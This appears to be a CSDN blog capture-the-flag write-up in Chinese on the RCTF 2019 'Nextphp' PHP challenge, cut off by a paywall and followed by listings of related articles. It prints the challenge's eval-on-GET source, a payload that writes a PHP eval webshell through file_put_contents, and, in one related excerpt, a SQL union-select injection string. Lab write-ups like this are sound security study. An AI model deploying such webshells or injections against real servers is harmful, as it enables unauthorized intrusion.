[RCTF 2019]Nextphp

最新推荐文章于 2024-09-08 09:17:27 发布
最新推荐文章于 2024-09-08 09:17:27 发布
阅读量328 收藏 2
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126650763
版权

PHP7.4 FFI扩展 安全挑战 预加载 命令执行
关键词由CSDN通过智能技术生成

前言:

.............

考点:

php7.4的FFI扩展安全问题以及利用

我的解题思路:

进入环境:

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

先传phpinfo() 看看。 

 看到open_basedir 想着 能利用  set_ini 来进行读取flag,但是看到 disable_functions

看到禁用了非常多的函数, 连 sysmlink都禁用了,说明我们无法从open_basedir 的层面上绕过。

禁用的函数够多,但是没有禁用 file_put_contents,轻松写马。

pyload:

/?a= file_put_content('1.php','<?php eval($_POST[1]);?>');

连接 

没法看到   根目录,显示 没有权限, 看来不是file_put_contents 写个马这么简单。

继续思考:

最低0.47元/天 解锁文章
snowlyzz
关注
专栏目录
RCTF2020.zip
07-20
RCTF2020 比赛逆向 pwn等赛题,除web题外所有赛题均有
PHP7.4 FFI 扩展安全问题
weixin_63231007的博客
02-22 1906
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
发现FuelPHP:重构你的PHP开发之旅
最新发布
gitblog_00294的博客
09-08 661
发现FuelPHP:重构你的PHP开发之旅 fuelphpFuelPHP framework项目地址:https://gitcode.com/gh_mirrors/fu/fuelphp 项目介绍 FuelPHP,一个专为追求速度与轻量级设计的PHP 5.4框架,自诞生之日起便立志在众多框架中脱颖而出。它汇聚了开发者对各大优秀框架的喜爱之处,同时坚决摒弃那些累赘,力求以简洁高效的姿态,引领PHP...
[RCTF 2019]Nextphpphp7.4的FFI扩展安全问题)
m0_62422842的博客
12-14 704
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该题这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问题也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问题也是需要了解的。
RCTF2019-WEB-nextphp
river
05-31 1833
RCTF-web-nextphp <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } http://192.168.1.8/?a=var_dump(scandir(getcwd())); http://192.168.1.8/?a=show_so...
[RCTF 2019]Nextphp题解
blue_lotus_first的博客
09-21 1219
[RCTF 2019]NextPHP题解
rctf:redpwn的CTF平台
03-28
rCTF是redpwnCTF的CTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)...
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
Python库 | rctf-golf-1.0.0.tar.gz
03-10
本资源是一个名为“rctf-golf”的Python库,版本为1.0.0,封装在“rctf-golf-1.0.0.tar.gz”压缩包内。这个库可能是为了解决特定问题或提供某些功能而创建的,它通常包含一系列模块、脚本和文档,方便开发者在自己的...
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1820
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
[RCTF 2019]nextphp
rev1ve的博客
11-08 882
官方文档在php版本7.4或更高的版本中将和添加到类中,而无需考虑兼容性文档中给出了实例作者指出这种形式的代码无法可靠运行,因为嵌套的 serialize() 和 unserialize() 调用是以不同顺序执行的因为在序列化过程中,首先执行 A::serialize() 中的 serialize() 调用,然后执行 B::serialize() 中的 serialize() 调用。
[RCTF 2019]Nextphp&&php预加载实现FFI
Je3Z的博客
09-12 442
参考 <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 初看题目很简单,然后看了下phpinfo 过滤了挺多函数的,命令执行的都过滤了,然后还有open_basedir限制/var/www/html 然后可能会想一些绕过disable_function的姿势 1.LD_PRELOAD mail,putenv,error_log全被禁了 2.Apache Mod CGI
BUU刷题记录——5
weixin_43610673的博客
09-21 1669
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
php算法刷题网站,刷题[RCTF 2019]Nextphp
weixin_42364392的博客
04-14 312
解题思路打开发现,???,这么简单嘛,直接一句话写shellfile_put_contents('1.php','');蚁剑连接,???,就这?好吧,只有当前目录的权限,看preload.php,看着是反序列化了我懒,不想看序列化,不过感觉是都被禁了,没啥用bypass_diasble_function1.LD_PRELOADmail,putenv,error_log全被禁了,打扰了2.**Apa...
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3804
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
RCTF2018 WP
1CHIG0的博客
05-24 1807
感觉自己好久更了。。最近看了RCTF的WEB题,感觉好多前端。。然而前端并不是很会,于是趁着这个机会稍稍补了一些前端知识。又跟着大佬的wp复现了一下,收获不少,总结一下。AMP参考了1、https://ctftime.org/writeup/101012、https://xz.aliyun.com/t/2347进入页面,首先根据提示可以给一个参数name,输入?name=ichigo得到我们得到了...
rctf-golf 1.0.0 - Python开发语言新库发布
资源摘要信息:"rctf-golf-1.0.0.tar.gz" 知识点: 1. Python库:Python库是指用Python语言编写的软件包,它可以让开发者在编写程序时,复用经过验证的代码模块。Python的标准库中包含了大量的模块,用于操作字符串、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值